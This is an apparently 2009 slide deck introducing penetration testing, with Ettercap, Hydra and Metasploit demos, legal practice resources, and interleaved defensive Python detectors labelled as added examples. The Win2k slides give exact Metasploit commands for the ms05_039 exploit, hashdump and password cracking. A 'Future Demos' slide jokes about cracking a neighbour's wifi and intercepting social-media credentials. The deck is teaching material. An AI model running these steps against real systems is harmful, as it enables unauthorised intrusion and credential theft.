Hack Attack! An Introduction to Penetration Testing
Steve Phillips (aka fraktil), 2009.12.17 @ SBLUG
Who Am I?
● Attended UCSB 2004-2008
  – Majored in Math and Philosophy, not CS
● Started using Linux in 2001
  – Mandrake, then Slackware, then Debian
● Applying for penetration testing job in January
● Biases/“Preferences”
  – Linux > Windoze (duh)
  – Python > Ruby
  – Emacs > vi
  – Debian (and variants) > others
Can Hacking Be Ethical? Or, What Is Ethical Hacking?
● Black Hat
  – Compromises computer systems without permission
  – Criminal
● White Hat, aka Ethical Hacker
  – Gets paid to hack – legally (friggin' sweet)
  – Always gets permission before attacking a system
● Gray Hat
  – Some combination of Black and White
The Stages of Hackerdom
● Script Kiddie (“skiddie”)
  – Can only run automated tools
  – Doesn't understand underlying technology
● Advanced Beginner
  – Mastered advanced features of many tools
  – Knows enough programming to create own tools
    ● C => Python, Ruby (see next slide)
● Uberhacker
  – Discovers new vulnerabilities (or new types of vulns)
  – Knows Assembly, C, Python and/or Ruby, SQL
  – Excellent programmer; writes tools, scripts regularly
  – Can defend as well as attack (firewalls, IDS, etc)
Programming Languages Used to Create Hacking Tools
● C
  – Nmap (network mapper, portscanner, more)
  – Nessus (vulnerability detection)
  – Wireshark (network sniffer)
● Python
  – w3af (web app attack framework)
  – sqlmap (automatic SQL injection)
  – TheMiddler (session hijacking, targeted pw sniffing)
● Ruby
  – Metasploit (vuln exploitation, much more)
What About in Back|Track 4? Overall: Tools + Exploits
● File count: find /pentest | grep \\.c$ | wc -l
● Line count: cat $(find /pentest | grep \\.c$) | wc -l
● C: 4058 .c files, 1,300,000 lines
● Python: 2431 .py files, 612,000 lines
● Ruby: 5468 .rb files, 694,000 lines
  – 2773 files from Metasploit
  – 1271 files from Dradis (information organizing, sharing)
  – 1424 other
● C++: 431 .cpp files, 144,000 lines
What About in Back|Track 4? Exploits Only (from exploitdb)
● C
  – 1321 .c files
● Python
  – 405 .py files
● Ruby
  – 146 .rb files
● C++
  – 110 .cpp files
TIOBE Index: Programming Language Popularity
Back|Track 4 Categories
● Information Gathering
  – Email addresses, DNS
● Network Mapping
● Vulnerability Identification
● Web Application Analysis
● Radio Network Analysis
● Penetration (not that kind)
Back|Track 4 Categories
● Privilege Escalation
● Maintaining Access
● Digital Forensics
● Reverse Engineering
● VoIP (Voice over Internet Protocol)
● Misc
DEMO: Sniffing Passwords with Ettercap
● ARP Poisoning for MitM Attack
  – Associate attacker's MAC with router's IP
  – Target tries to route traffic through router
    ● Routes it through attacker instead
  – Attacker forwards traffic both ways
  – Attacker can silently watch or inject traffic
● TheMiddler, sslstrip
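The ARP poisoning on this slide leaves a signature a defender can watch for: the gateway IP suddenly answering from a different MAC, and one MAC claiming several IPs at once. Added example (not from the talk): a Python check over a constructed list of ARP replies that raises both alerts; the addresses and MACs are made up.

```python
from collections import defaultdict

# Constructed sample of observed ARP replies as (sender_ip, sender_mac), in
# arrival order. 192.168.1.1 is the gateway, aa:bb:cc:... are the real NICs,
# de:ad:be:ef:00:20 is the host that starts poisoning (all values made up).
SAMPLE_REPLIES = [
    ("192.168.1.1", "aa:bb:cc:00:00:01"),
    ("192.168.1.10", "aa:bb:cc:00:00:10"),
    ("192.168.1.20", "de:ad:be:ef:00:20"),
    ("192.168.1.1", "de:ad:be:ef:00:20"),   # gateway IP now claimed by the intruder
    ("192.168.1.10", "de:ad:be:ef:00:20"),  # target IP claimed by the same MAC
]


def detect_arp_spoof(replies, gateway_ip):
    """Return alert strings for the two symptoms of the MitM setup above:
    an IP (especially the gateway) changing MAC, and one MAC answering for
    more than one IP (the attacker impersonating router and target at once)."""
    ip_to_mac = {}                  # last MAC seen for each IP
    mac_to_ips = defaultdict(set)   # all IPs each MAC has claimed so far
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            kind = "gateway" if ip == gateway_ip else "host"
            alerts.append(f"{kind} {ip} changed MAC {prev} -> {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                claimed = ", ".join(sorted(mac_to_ips[mac]))
                alerts.append(f"MAC {mac} claims multiple IPs: {claimed}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES, "192.168.1.1"):
        print("ALERT:", alert)
```

On a real segment the same logic can be fed from a passive ARP capture or from periodic dumps of the ARP cache; a static ARP entry for the gateway is the usual mitigation.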
How Else Can We Get Creds?
● Phishing
  – Via email
● Spear Phishing
  – Becoming popular
  – Very hard to stop
● In-person Social Engineering
  – Kevin Mitnick is famous for this
● Brute force
DEMO: Bruteforcing FTP
● Using Hydra to bruteforce weak FTP password
  – Well, really a dictionary attack
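The dictionary attack above shows up on the server side as a burst of FAIL LOGIN lines from one client. Added example (not from the talk): a Python detector over constructed vsftpd-style log lines that flags a client reaching five failures inside a one-minute sliding window and notes whether a successful login followed the burst; the hosts and timestamps are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed vsftpd-style lines: `<date> [pid N] [user] FAIL|OK LOGIN: Client "ip"`.
# 10.0.0.5 guesses the admin password and finally gets in; 10.0.0.7 is one typo.
SAMPLE_LOG = """\
Thu Dec 17 20:15:01 2009 [pid 4301] [admin] FAIL LOGIN: Client "10.0.0.5"
Thu Dec 17 20:15:02 2009 [pid 4302] [admin] FAIL LOGIN: Client "10.0.0.5"
Thu Dec 17 20:15:02 2009 [pid 4303] [admin] FAIL LOGIN: Client "10.0.0.5"
Thu Dec 17 20:15:03 2009 [pid 4304] [admin] FAIL LOGIN: Client "10.0.0.5"
Thu Dec 17 20:15:04 2009 [pid 4305] [admin] FAIL LOGIN: Client "10.0.0.5"
Thu Dec 17 20:15:05 2009 [pid 4306] [admin] OK LOGIN: Client "10.0.0.5"
Thu Dec 17 20:16:30 2009 [pid 4310] [bob] FAIL LOGIN: Client "10.0.0.7"
Thu Dec 17 20:16:40 2009 [pid 4311] [bob] OK LOGIN: Client "10.0.0.7"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<ip>[\d.]+)"'
)

def parse_line(line):
    # Returns (timestamp, user, "FAIL"/"OK", client_ip), or None for non-login lines.
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["user"], m["result"], m["ip"]

def find_bruteforce(log_text, threshold=5, window_s=60):
    """Map client IP -> summary for clients reaching `threshold` failures in a `window_s` window."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    hits = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, user, result, ip = parsed
        q = recent[ip]
        while q and ts - q[0] > timedelta(seconds=window_s):
            q.popleft()               # expire failures that fell out of the window
        if result == "FAIL":
            q.append(ts)
            if len(q) >= threshold:
                rec = hits.setdefault(ip, {"failures": 0, "users": set(), "success_after_burst": False})
                rec["failures"] = max(rec["failures"], len(q))
                rec["users"].add(user)
        elif ip in hits and q:
            hits[ip]["success_after_burst"] = True   # guess succeeded while the burst is still live
    return hits
```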
DEMO: Pwning Win2k
● Create database (or connect to existing)
  – db_create [optional_database_name]
● Find win2k box using nmap (in metasploit)
  – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
● Search Metasploit for win2k exploits
  – search 2000
● Use exploit w/meterpreter
  – use exploit/windows/smb/ms05_039_pnp
  – set PAYLOAD windows/meterpreter/bind_tcp
● Which parameters still need to be set?
  – show options
DEMO: Pwning Win2k
● Set parameters
  – set RHOST [target_ip]
● Now we exploit! Can you guess the command?
  – exploit
● Get hashes
  – hashdump
  – This would be much harder without meterpreter!
● Copy and paste hashes into new text file
● Crack hashes with john the ripper
  – ./john [file_containing_hashes].txt
● Game Over
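Why john gets through the dumped hashes so quickly: Windows 2000 still stores the legacy LM hash next to the NT hash, and LM hashes a password as two independent 7-character halves. Added example (not part of the talk): a Python audit over constructed hashdump-format lines that reports which accounts still have an LM hash stored (and which have a blank password), using the well-known empty-LM and empty-NT constants; every other hash value is a placeholder.

```python
# Well-known constants: the LM hash of an empty 7-char block and the NT hash of "".
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed hashdump output (user:rid:lm_hash:nt_hash:::). Apart from the two
# empty-password constants above, the hex values are placeholders, not real hashes.
SAMPLE_HASHDUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""


def audit_hashdump(text):
    """Per account: is an LM hash stored, how long can the password be, is it blank?"""
    report = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        # LM hashes the password in two independent 7-character halves, so each
        # non-empty half is cracked on its own and bounds the password length.
        halves_set = sum(1 for half in (lm[:16], lm[16:32]) if half != EMPTY_LM_HALF)
        report[user] = {
            "rid": rid,
            "lm_stored": halves_set > 0,
            "lm_max_len": {0: 0, 1: 7, 2: 14}[halves_set],   # 0 => no LM hash to attack
            "blank_password": nt == EMPTY_NT,
        }
    return report


def accounts_needing_action(report):
    """Accounts that still store an LM hash or have a blank password."""
    return sorted(u for u, r in report.items() if r["lm_stored"] or r["blank_password"])


if __name__ == "__main__":
    rep = audit_hashdump(SAMPLE_HASHDUMP)
    for user in accounts_needing_action(rep):
        print(user, rep[user])
```

Disabling LM hash storage and resetting the affected passwords removes the fast path the cracking step relies on.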
Why Become an Ethical Hacker?
● Field is growing (see next slide)
  – New laws, regulations
  – US government falling behind in cyber security
● You get paid to hack – need I say more?
  – Banks
  – Telecoms
  – Casinos
  – Foreign countries (for the federal gov't)
How Can I Practice Legally?
● Virtualization (VMware, VirtualBox)
  – Use virtual images from recent CTF competitions
    ● http://lampsecurity.org/capture-the-flag-6
    ● http://ctf.hcesperer.org/25c3ctf
    ● http://ctf.hcesperer.org/daopen08
    ● http://ctf.hcesperer.org/eh08ctf
● NetWars
  – Part of government's Cyber Defense Initiative 2009
● DVL: Damn Vulnerable Linux
  – Purposely misconfigured, exploitable
  – http://tinyurl.com/dvllinux15
Further Resources: Learning
● Metasploit
  – Online Class: http://www.offensive-security.com/metasploit-unleashed/
● Nmap Guide
  – http://nmap.org/book/man.html
● Security Videos, Tutorials
  – http://securitytube.net
Tools Added to Back|Track: Extra Tools I Used
● Metasploit 3.3.2 (updated)
● Nmap 5.0 (updated)
● Exploitdb archive (/pentest/exploits/exploitdb)
Summary
● Hacking can be ethical
● “Computer security” is an oxymoron
  – No one is safe
● REALLY powerful hacking tools exist
● Metasploit is effing dangerous
Future Demos?
● More local fun
  – Crack neighbor's wifi (WEP)
  – Exploit remote vuln in DD-WRT firmware
  – Redirecting traffic using fake DNS server
  – Intercepting Twitter, Facebook, LinkedIn creds
● More like real pen testing
  – SQL injection
  – XSS
  – Nessus scan
Contact Information
● Name: Steve Phillips
● New Blog: SweetHack.blogspot.com
● Email: [email protected]
● Twitter: twitter.com/fraktil
● LinkedIn: linkedin.com/in/sdphillips
● IRC: fraktil in #sblug on borg-cube.com
Questions?